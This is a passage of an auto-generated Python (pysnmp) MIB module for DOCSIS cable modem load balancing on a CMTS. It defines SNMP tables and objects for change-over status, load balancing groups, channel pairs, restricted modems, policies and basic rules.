if mibBuilder.loadTexts: docsLoadBalChgOverStatusValue.setDescription("The status of the specified DCC/UCC operation. The enumerations are: messageSent(1): The CMTS has sent change over request message to the cable modem. noOpNeed(2): A operation was requested in which neither the DS Frequency nor the Upstream Channel ID was changed. An active value in this entry's row status indicates that no CMTS operation is required. modemDeparting(3): The cable modem has responded with a change over response of either a DCC-RSP with a confirmation code of depart(180) or a UCC-RSP. waitToSendMessage(4): The specified operation is active and CMTS is waiting to send the channel change message with channel info to the cable modem. cmOperationRejected(5): Channel Change (such as DCC or UCC) operation was rejected by the cable modem. cmtsOperationRejected(6) Channel Change (such as DCC or UCC) operation was rejected by the Cable modem Termination System. timeOutT13(7): Failure due to no DCC-RSP with confirmation code depart(180) received prior to expiration of the T13 timer. timeOutT15(8): T15 timer timed out prior to the arrival of a bandwidth request, RNG-REQ message, or DCC-RSP message with confirmation code of arrive(181) from the cable modem. rejectInit(9): DCC operation rejected due to unsupported initialization tech requested. success(10): CMTS received an indication that the CM successfully completed the change over operation. e.g., If an initialization technique of re-initialize the MAC is used, success in indicated by the receipt of a DCC-RSP message with a confirmation code of depart(180). In all other cases, success is indicated by: (1) the CMTS received a DCC-RSP message with confirmation code of arrive(181) or (2) the CMTS internally confirms the presence of the CM on the new channel.")
docsLoadBalChgOverStatusUpdate = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 2, 2, 1, 7), TimeStamp()).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChgOverStatusUpdate.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChgOverStatusUpdate.setDescription('The value of sysUpTime when docsLoadBalChgOverStatusValue was last updated.')
docsLoadBalGrpTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1), )
if mibBuilder.loadTexts: docsLoadBalGrpTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpTable.setDescription('This table contains the attributes of the load balancing groups present in this CMTS.')
docsLoadBalGrpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1), ).setIndexNames((0, "DOCS-LOADBALANCING-MIB", "docsLoadBalGrpId"))
if mibBuilder.loadTexts: docsLoadBalGrpEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpEntry.setDescription('A set of attributes of load balancing group in the CMTS. It is index by a docsLoadBalGrpId which is unique within a CMTS. Entries in this table persist after CMTS initialization.')
docsLoadBalGrpId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 4294967295)))
if mibBuilder.loadTexts: docsLoadBalGrpId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpId.setDescription('A unique index assigned to the load balancing group by the CMTS.')
docsLoadBalGrpIsRestricted = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 2), TruthValue().clone('false')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalGrpIsRestricted.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpIsRestricted.setDescription('A value true(1)Indicates type of load balancing group. A Restricted Load Balancing Group is associated to a specific provisioned set of cable modems. Restricted Load Balancing Group is used to accommodate a topology specific or provisioning specific restriction. Example such as a group that are reserved for business customers). Setting this object to true(1) means it is a Restricted Load Balancing type and setting it to false(2) means it is a General Load Balancing group type. This object should not be changed while its group ID is referenced by an active entry in docsLoadBalRestrictCmEntry.')
docsLoadBalGrpInitTech = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 3), ChannelChgInitTechMap()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalGrpInitTech.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpInitTech.setDescription("The initialization techniques that the CMTS can use when load balancing cable modems in the load balancing group. By default this object is initialized with all the defined bits having a value of '1'.")
docsLoadBalGrpDefaultPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalGrpDefaultPolicy.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpDefaultPolicy.setDescription('Each Load Balancing Group has a default Load Balancing Policy. A policy is described by a set of conditions (rules) that govern the load balancing process for a cable modem. The CMTS assigns this Policy ID value to a cable modem associated with the group ID when the cable modem does not signal a Policy ID during registration. The Policy ID value is intended to be a numeric reference to a row entry in docsLoadBalPolicyEntry. However, It is not required to have an existing or active entry in docsLoadBalPolicyEntry when setting the value of docsLoadBalGrpDefaultPolicy, in which case it indicates no policy is associated with the load Balancing Group. The Policy ID of value 0 is reserved to indicate no policy is associated with the load balancing group.')
docsLoadBalGrpEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 5), TruthValue().clone('true')).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalGrpEnable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpEnable.setDescription('Setting this object to true(1) enables internal autonomous load balancing on this group. Setting it to false(2) disables the load balancing operation on this group.')
docsLoadBalGrpChgOverSuccess = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalGrpChgOverSuccess.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpChgOverSuccess.setDescription('The number of successful load balancing change over operations initiated within this load balancing group.')
docsLoadBalGrpChgOverFails = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalGrpChgOverFails.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpChgOverFails.setDescription('The number of failed load balancing change over operations initiated within this load balancing group.')
docsLoadBalGrpStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 1, 1, 8), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalGrpStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalGrpStatus.setDescription("Indicates the status of the row in this table. Setting this object to 'destroy' or 'notInService' for a group ID entry already referenced by docsLoadBalChannelEntry, docsLoadBalChnPairsEntry or docsLoadBalRestrictCmEntry returns an error code inconsistentValue.")
docsLoadBalChannelTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 2), )
if mibBuilder.loadTexts: docsLoadBalChannelTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChannelTable.setDescription('Lists all upstream and downstream channels associated with load balancing groups.')
docsLoadBalChannelEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 2, 1), ).setIndexNames((0, "DOCS-LOADBALANCING-MIB", "docsLoadBalGrpId"), (0, "DOCS-LOADBALANCING-MIB", "docsLoadBalChannelIfIndex"))
if mibBuilder.loadTexts: docsLoadBalChannelEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChannelEntry.setDescription('Lists a specific upstream or downstream, within a load Balancing group. An entry in this table exists for each ifEntry with an ifType of docsCableDownstream(128) and docsCableUpstream(129) associated with the Load Balancing Group. Entries in this table persist after CMTS initialization.')
docsLoadBalChannelIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 2, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: docsLoadBalChannelIfIndex.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChannelIfIndex.setDescription('The ifIndex of either the downstream or upstream.')
docsLoadBalChannelStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 2, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalChannelStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChannelStatus.setDescription("Indicates the status of the rows in this table. Creating entries in this table requires an existing value for docsLoadBalGrpId in docsLoadBalGrpEntry and an existing value of docsLoadBalChannelIfIndex in ifEntry, otherwise is rejected with error 'noCreation'. Setting this object to 'destroy' or 'notInService for a a row entry that is being referenced by docsLoadBalChnPairsEntry is rejected with error code inconsistentValue.")
docsLoadBalChnPairsTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3), )
if mibBuilder.loadTexts: docsLoadBalChnPairsTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsTable.setDescription('This table contains pairs of upstream channels within a Load Balancing Group. Entries in this table are used to override the initialization techniques defined for the associated Load Balancing Group.')
docsLoadBalChnPairsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3, 1), ).setIndexNames((0, "DOCS-LOADBALANCING-MIB", "docsLoadBalGrpId"), (0, "DOCS-LOADBALANCING-MIB", "docsLoadBalChnPairsIfIndexDepart"), (0, "DOCS-LOADBALANCING-MIB", "docsLoadBalChnPairsIfIndexArrive"))
if mibBuilder.loadTexts: docsLoadBalChnPairsEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsEntry.setDescription('An entry in this table describes a channel pair for which an initialization technique override is needed. On a CMTS which supports logical upstream channels (ifType is equal to docsCableUpstreamChannel(205)), the entries in this table correspond to pairs of ifType 205. On a CMTS which only supports physical upstream channels (ifType is equal to docsCableUpstream(129)), the entries in this table correspond to pairs of ifType 129. Entries in this table persist after CMTS initialization.')
docsLoadBalChnPairsIfIndexDepart = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: docsLoadBalChnPairsIfIndexDepart.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsIfIndexDepart.setDescription('This index indicates the ifIndex of the upstream channel from which a cable modem would depart in a load balancing channel change operation.')
docsLoadBalChnPairsIfIndexArrive = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3, 1, 2), InterfaceIndex())
if mibBuilder.loadTexts: docsLoadBalChnPairsIfIndexArrive.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsIfIndexArrive.setDescription('This index indicates the ifIndex of the upstream channel on which a cable modem would arrive in a load balancing channel change operation.')
docsLoadBalChnPairsOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("operational", 1), ("notOperational", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: docsLoadBalChnPairsOperStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsOperStatus.setDescription('Operational status of the channel pair. The value operational(1) indicates that ifOperStatus of both channels is up(1). The value notOperational(2) means that ifOperStatus of one or both is not up(1).')
docsLoadBalChnPairsInitTech = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3, 1, 4), ChannelChgInitTechMap()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalChnPairsInitTech.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsInitTech.setDescription("Specifies initialization technique for load balancing for the Depart/Arrive pair. By default this object's value is the initialization technique configured for the Load Balancing Group indicated by docsLoadBalGrpId.")
docsLoadBalChnPairsRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 3, 1, 5), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalChnPairsRowStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalChnPairsRowStatus.setDescription("The object for conceptual rows creation. An attempt to create a row with values for docsLoadBalChnPairsIfIndexDepart or docsLoadBalChnPairsIfIndexArrive which are not a part of the Load Balancing Group (or for a 2.0 CMTS are not logical channels (ifType 205)) are rejected with a 'noCreation' error status reported. There is no restriction on settings columns in this table when the value of docsLoadBalChnPairsRowStatus is active(1).")
docsLoadBalRestrictCmTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 4), )
if mibBuilder.loadTexts: docsLoadBalRestrictCmTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalRestrictCmTable.setDescription('Lists all cable modems in each Restricted Load Balancing Groups.')
docsLoadBalRestrictCmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 4, 1), ).setIndexNames((0, "DOCS-LOADBALANCING-MIB", "docsLoadBalGrpId"), (0, "DOCS-LOADBALANCING-MIB", "docsLoadBalRestrictCmIndex"))
if mibBuilder.loadTexts: docsLoadBalRestrictCmEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalRestrictCmEntry.setDescription('An entry of modem within a restricted load balancing group type. An entry represents a cable modem that is associated with the Restricted Load Balancing Group ID of a Restricted Load Balancing Group. Entries in this table persist after CMTS initialization.')
docsLoadBalRestrictCmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 4, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 4294967295)))
if mibBuilder.loadTexts: docsLoadBalRestrictCmIndex.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalRestrictCmIndex.setDescription('The index that uniquely identifies an entry which represents restricted cable modem(s) within each Restricted Load Balancing Group.')
docsLoadBalRestrictCmMACAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 4, 1, 2), MacAddress()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalRestrictCmMACAddr.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalRestrictCmMACAddr.setDescription('Mac Address of the cable modem within the restricted load balancing group.')
docsLoadBalRestrictCmMacAddrMask = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 4, 1, 3), OctetString().subtype(subtypeSpec=ConstraintsUnion(ValueSizeConstraint(0, 0), ValueSizeConstraint(6, 6), )).clone(hexValue="")).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalRestrictCmMacAddrMask.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalRestrictCmMacAddrMask.setDescription('A bit mask acting as a wild card to associate a set of modem MAC addresses to the same Group ID. Cable modem look up is performed first with entries containing this value not null, if several entries match, the largest consecutive bit match from MSB to LSB is used. Empty value is equivalent to the bit mask all in ones.')
docsLoadBalRestrictCmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 3, 4, 1, 4), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalRestrictCmStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalRestrictCmStatus.setDescription("Indicates the status of the rows in this table. The attempt to create an entry associated to a group ID with docsLoadBalGrpIsRestricted equal to false(2) returns an error 'noCreation'. There is no restriction on settings columns in this table any time.")
docsLoadBalPolicyTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 1), )
if mibBuilder.loadTexts: docsLoadBalPolicyTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPolicyTable.setDescription('This table describes the set of Load Balancing policies. Rows in this table might be referenced by rows in docsLoadBalGrpEntry.')
docsLoadBalPolicyEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 1, 1), ).setIndexNames((0, "DOCS-LOADBALANCING-MIB", "docsLoadBalPolicyId"), (0, "DOCS-LOADBALANCING-MIB", "docsLoadBalPolicyRuleId"))
if mibBuilder.loadTexts: docsLoadBalPolicyEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPolicyEntry.setDescription('Entries containing rules for policies. When a load balancing policy is defined by multiple rules, all the rules apply. Load balancing rules can be created to allow for specific vendor-defined load balancing actions. However there is a basic rule that the CMTS is required to support by configuring a pointer in docsLoadBalPolicyRulePtr to the table docsLoadBalBasicRuleTable. Vendor specific rules may be added by pointing the object docsLoadBalPolicyRulePtr to proprietary mib structures. Entries in this table persist after CMTS initialization.')
docsLoadBalPolicyId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 1, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 4294967295)))
if mibBuilder.loadTexts: docsLoadBalPolicyId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPolicyId.setDescription('An index identifying the Load Balancing Policy.')
docsLoadBalPolicyRuleId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 1, 1, 2), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 4294967295)))
if mibBuilder.loadTexts: docsLoadBalPolicyRuleId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPolicyRuleId.setDescription('An index for the rules entries associated within a policy.')
docsLoadBalPolicyRulePtr = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 1, 1, 3), RowPointer().clone((0, 0))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalPolicyRulePtr.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPolicyRulePtr.setDescription('A pointer to an entry in a rule table. E.g., docsLoadBalBasicRuleEnable in docsLoadBalBasicRuleEntry. A value pointing to zeroDotZero, an inactive Row or a non-existing entry is treated as no rule defined for this policy entry.')
docsLoadBalPolicyRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 1, 1, 5), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalPolicyRowStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPolicyRowStatus.setDescription("The status of this conceptual row. There is no restriction on settings columns in this table when the value of docsLoadBalPolicyRowStatus is active(1). Setting this object to 'destroy' or 'notInService' for a row entry that is being referenced by docsLoadBalGrpDefaultPolicy in docsLoadBalGrpEntry returns an error code inconsistentValue.")
docsLoadBalBasicRuleTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2), )
if mibBuilder.loadTexts: docsLoadBalBasicRuleTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleTable.setDescription('DOCSIS defined basic ruleset for load Balancing Policy. This table enables of disable load balancing for the groups pointing to this ruleset in the policy group.')
docsLoadBalBasicRuleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2, 1), ).setIndexNames((0, "DOCS-LOADBALANCING-MIB", "docsLoadBalBasicRuleId"))
if mibBuilder.loadTexts: docsLoadBalBasicRuleEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleEntry.setDescription('An entry of DOCSIS defined basic ruleset. The object docsLoadBalBasicRuleEnable is used for instantiating an entry in this table via a RowPointer. Entries in this table persist after CMTS initialization.')
docsLoadBalBasicRuleId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 4294967295)))
if mibBuilder.loadTexts: docsLoadBalBasicRuleId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleId.setDescription('The unique index for this row.')
docsLoadBalBasicRuleEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2), ("disabledPeriod", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalBasicRuleEnable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleEnable.setDescription('When using this ruleset, load balancing is enabled or disabled by the values enabled(1) and disabled(2) respectively. Additionally, a Load Balancing disabling period is defined in docsLoadBalBasicRuleDisStart and docsLoadBalBasicRuleDisPeriod if this object value is set to disabledPeriod(3).')
docsLoadBalBasicRuleDisStart = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 86400))).setUnits('seconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalBasicRuleDisStart.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleDisStart.setDescription('if object docsLoadBalBasicRuleEnable is disablePeriod(3) Load Balancing is disabled starting at this object value time (seconds from 12 AM). Otherwise, this object has no meaning.')
docsLoadBalBasicRuleDisPeriod = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2, 1, 4), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 86400))).setUnits('seconds').setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalBasicRuleDisPeriod.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleDisPeriod.setDescription('If object docsLoadBalBasicRuleEnable is disablePeriod(3) Load Balancing is disabled for the period of time defined between docsLoadBalBasicRuleDisStart and docsLoadBalBasicRuleDisStart plus the period of time of docsLoadBalBasicRuleDisPeriod. Otherwise, this object value has no meaning.')
docsLoadBalBasicRuleRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 4, 2, 1, 5), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: docsLoadBalBasicRuleRowStatus.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleRowStatus.setDescription("This object is to create or delete rows in this table. There is no restriction for changing this row status or object's values in this table at any time.")
docsLoadBalCmtsCmStatusTable = MibTable((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1, 4), )
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusTable.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusTable.setDescription('The list contains the load balancing attributes associated with the cable modem. ')
docsLoadBalCmtsCmStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1, 4, 1), )
docsIfCmtsCmStatusEntry.registerAugmentions(("DOCS-LOADBALANCING-MIB", "docsLoadBalCmtsCmStatusEntry"))
docsLoadBalCmtsCmStatusEntry.setIndexNames(*docsIfCmtsCmStatusEntry.getIndexNames())
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusEntry.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusEntry.setDescription('Additional objects for docsIfCmtsCmStatusTable entry that relate to load balancing ')
docsLoadBalCmtsCmStatusGroupId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1, 4, 1, 1), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusGroupId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusGroupId.setDescription('The Group ID associated with this cable modem.')
docsLoadBalCmtsCmStatusPolicyId = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1, 4, 1, 2), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusPolicyId.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusPolicyId.setDescription('The Policy ID associated with this cable modem.')
docsLoadBalCmtsCmStatusPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 1, 1, 4, 1, 3), Unsigned32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusPriority.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusPriority.setDescription('The Priority associated with this cable modem.')
docsLoadBalConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2))
docsLoadBalCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 1))
docsLoadBalGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 2))
docsLoadBalBasicCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 1, 1)).setObjects(("DOCS-LOADBALANCING-MIB", "docsLoadBalSystemGroup"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalParametersGroup"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalPoliciesGroup"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalBasicRuleGroup"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalCmtsCmStatusGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
docsLoadBalBasicCompliance = docsLoadBalBasicCompliance.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicCompliance.setDescription('The compliance statement for DOCSIS load balancing systems.')
docsLoadBalSystemGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 2, 1)).setObjects(("DOCS-LOADBALANCING-MIB", "docsLoadBalEnable"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverMacAddress"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverDownFrequency"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverUpChannelId"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverInitTech"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverCmd"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverCommit"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverLastCommit"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusMacAddr"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusDownFreq"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusUpChnId"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusInitTech"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusCmd"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusValue"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChgOverStatusUpdate"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
docsLoadBalSystemGroup = docsLoadBalSystemGroup.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalSystemGroup.setDescription('A collection of objects providing system-wide parameters for load balancing.')
docsLoadBalParametersGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 2, 2)).setObjects(("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpIsRestricted"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpInitTech"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpDefaultPolicy"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpEnable"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpChgOverSuccess"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpChgOverFails"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalGrpStatus"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChannelStatus"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChnPairsOperStatus"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChnPairsInitTech"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalChnPairsRowStatus"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalRestrictCmMACAddr"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalRestrictCmMacAddrMask"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalRestrictCmStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
docsLoadBalParametersGroup = docsLoadBalParametersGroup.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalParametersGroup.setDescription('A collection of objects containing the load balancing parameters.')
docsLoadBalPoliciesGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 2, 3)).setObjects(("DOCS-LOADBALANCING-MIB", "docsLoadBalPolicyRulePtr"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalPolicyRowStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
docsLoadBalPoliciesGroup = docsLoadBalPoliciesGroup.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalPoliciesGroup.setDescription('A collection of objects providing policies.')
docsLoadBalBasicRuleGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 2, 4)).setObjects(("DOCS-LOADBALANCING-MIB", "docsLoadBalBasicRuleEnable"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalBasicRuleDisStart"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalBasicRuleDisPeriod"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalBasicRuleRowStatus"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
docsLoadBalBasicRuleGroup = docsLoadBalBasicRuleGroup.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalBasicRuleGroup.setDescription('DOCSIS defined basic Ruleset for load balancing policies.')
